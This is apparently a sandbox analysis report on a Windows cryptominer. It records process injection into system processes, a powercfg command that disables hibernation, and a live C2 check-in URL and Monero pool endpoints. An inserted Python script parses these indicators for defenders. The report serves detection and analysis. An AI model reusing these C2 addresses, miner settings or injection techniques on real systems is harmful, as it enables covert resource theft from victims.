Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe, Code function: 21_2_000001E85898DCE0 FindFirstFileExW,21_2_000001E85898DCE0
Source: C:\Windows\System32\lsass.exe, Code function: 27_2_00000140AE86DCE0 FindFirstFileExW,27_2_00000140AE86DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 30_2_00000195DD5CDCE0 FindFirstFileExW,30_2_00000195DD5CDCE0
Source: C:\Windows\System32\dwm.exe, Code function: 31_2_000001160CA1DCE0 FindFirstFileExW,31_2_000001160CA1DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 46_2_00000257E10ADCE0 FindFirstFileExW,46_2_00000257E10ADCE0
Source: C:\Windows\System32\svchost.exe, Code function: 47_2_000001F28C93DCE0 FindFirstFileExW,47_2_000001F28C93DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 48_2_000001CA9854DCE0 FindFirstFileExW,48_2_000001CA9854DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 49_2_000001D26531DCE0 FindFirstFileExW,49_2_000001D26531DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 50_2_00000254A27DDCE0 FindFirstFileExW,50_2_00000254A27DDCE0
Source: C:\Windows\System32\svchost.exe, Code function: 51_2_0000024B87DDDCE0 FindFirstFileExW,51_2_0000024B87DDDCE0
Source: C:\Windows\System32\svchost.exe, Code function: 52_2_00000205FD40DCE0 FindFirstFileExW,52_2_00000205FD40DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 53_2_000001A2056ADCE0 FindFirstFileExW,53_2_000001A2056ADCE0
Source: C:\Windows\System32\svchost.exe, Code function: 54_2_0000018EC1F6DCE0 FindFirstFileExW,54_2_0000018EC1F6DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 55_2_0000025CE3E0DCE0 FindFirstFileExW,55_2_0000025CE3E0DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 56_2_000002623898DCE0 FindFirstFileExW,56_2_000002623898DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 57_2_000002786E59DCE0 FindFirstFileExW,57_2_000002786E59DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 58_2_000001611FFADCE0 FindFirstFileExW,58_2_000001611FFADCE0
Source: C:\Windows\System32\svchost.exe, Code function: 59_2_0000027C0F38DCE0 FindFirstFileExW,59_2_0000027C0F38DCE0
          Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 141.94.96.144:8080
          Source: global traffic | TCP traffic: 192.168.2.5:56921 -> 162.159.36.2:53
          Source: Joe Sandbox View | IP Address: 141.94.96.144
          Source: Joe Sandbox View | ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Joe Sandbox View | ASN Name: INF-NET-ASRU
          Source: Network traffic | Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:59674 -> 1.1.1.1:53
          Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49705 -> 83.217.209.235:80
          Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:57087 -> 83.217.209.235:80
          Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:57089 -> 83.217.209.235:80
          Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.144:8080
          Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 (16 occurrences)
          Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
          Source: global traffic | DNS traffic detected: DNS query: pool.supportxmr.com
          Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
          Source: unknown | HTTP traffic detected: POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
              Accept: */*
              Connection: close
              Content-Length: 485
              Content-Type: application/json
              Host: 83.217.209.235
              User-Agent: cpp-httplib/0.12.6
          Source: lsass.exe, 0000001B.00000002.3380812837.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://3csp.icrosof4m/ocp0
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL(
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldn
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpo
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
          Source: lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 0000001B.00000002.3373903281.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 0000001B.00000002.3373903281.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
          Source: svchost.exe, 00000035.00000002.3378496559.000001A204EE0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://172.94.1q
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms
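The networking evidence above is a flat list of sandbox observations. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it shows how a responder turns those lines into a deduplicated IOC set, keeping public IP:port pairs apart from resolver traffic, reversing the in-addr.arpa PTR lookup back to the address it resolves, collecting Suricata SIDs, and collapsing the memory-string URL variants (`...php)L`, `...php--c`) onto their clean prefix. The sample lines are copied from the report; the suffix-collapse heuristic, the category names and the decision to treat port-53 destinations as resolvers rather than C2 are this example's own choices.

```python
"""Extract network IOCs from Joe Sandbox plain-text evidence lines (added example)."""
import ipaddress
import re
from typing import Dict, Iterable, Set

# Constructed sample input: evidence lines copied from the report above,
# including the memory-string URL variants that carry trailing garbage.
SAMPLE_LINES = [
    "Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.144:8080",
    "Source: global trafficTCP traffic: 192.168.2.5:56921 -> 162.159.36.2:53",
    "Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:59674 -> 1.1.1.1:53",
    "Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49705 -> 83.217.209.235:80",
    "Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.144:8080",
    "Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235",
    "Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com",
    "Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa",
    "Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php",
    "Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L",
    "Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c",
    "Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms",
]

ENDPOINT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
SURICATA_RE = re.compile(r"Suricata IDS: (\d+) - Severity \d - .*? : \S+ -> \S+$")
DNS_RE = re.compile(r"DNS query: (\S+)$")
PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa$", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+")


def _public_ip(text: str) -> bool:
    """True only for a syntactically valid, globally routable address (drops 192.168.x.x)."""
    try:
        return ipaddress.ip_address(text).is_global
    except ValueError:
        return False


def collapse_suffix_variants(urls: Set[str]) -> Set[str]:
    """Heuristic (ours): keep a URL only if no shorter URL in the set is a prefix of it.

    Memory carving yields the real URL plus copies with trailing junk; the clean
    form is the shortest common prefix, so the variants fold onto it.
    """
    kept: Set[str] = set()
    for url in sorted(urls, key=len):
        if not any(url.startswith(k) for k in kept):
            kept.add(url)
    return kept


def extract_iocs(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Parse report evidence lines into IOC buckets (category names are ours)."""
    buckets = ("ips", "tcp_endpoints", "resolvers", "domains", "ptr_targets", "urls", "suricata_sids")
    iocs: Dict[str, Set[str]] = {k: set() for k in buckets}
    raw_urls: Set[str] = set()
    for line in lines:
        for ip, port in ENDPOINT_RE.findall(line):
            if not _public_ip(ip):
                continue  # sandbox client address, not an indicator
            if port == "53":
                iocs["resolvers"].add(f"{ip}:{port}")  # resolver, not the miner pool or C2
            else:
                iocs["tcp_endpoints"].add(f"{ip}:{port}")
                iocs["ips"].add(ip)
        if m := SURICATA_RE.search(line):
            iocs["suricata_sids"].add(m.group(1))
        if m := DNS_RE.search(line):
            name = m.group(1).rstrip(".").lower()
            if ptr := PTR_RE.match(name):
                # 198.187.3.20.in-addr.arpa is the reverse lookup for 20.3.187.198
                iocs["ptr_targets"].add(".".join(reversed(ptr.groups())))
            elif _public_ip(name):
                iocs["ips"].add(name)  # "without corresponding DNS query" lines carry a bare IP
            elif not name.replace(".", "").isdigit():
                iocs["domains"].add(name)
        raw_urls.update(URL_RE.findall(line))
    iocs["urls"] = collapse_suffix_variants(raw_urls)
    return iocs


if __name__ == "__main__":
    for bucket, values in extract_iocs(SAMPLE_LINES).items():
        print(f"{bucket}: {sorted(values)}")
```

Run on the report lines this yields the pool endpoint 141.94.96.144:8080, the check-in host 83.217.209.235:80, pool.supportxmr.com, a single cleaned endpoint.php URL and the three Suricata SIDs, with 1.1.1.1 and 162.159.36.2 filed as resolvers so they do not end up on a blocklist.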

          System Summary

          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF749F41394 NtTerminateProcess
          Source: C:\Windows\System32\dialer.exe | Code function: 14_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\ProgramData\IGaming\driver.exe | Code function: 26_2_00007FF7F4F21394 NtFreezeRegistry
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160CA128C8 NtEnumerateValueKey,NtEnumerateValueKey
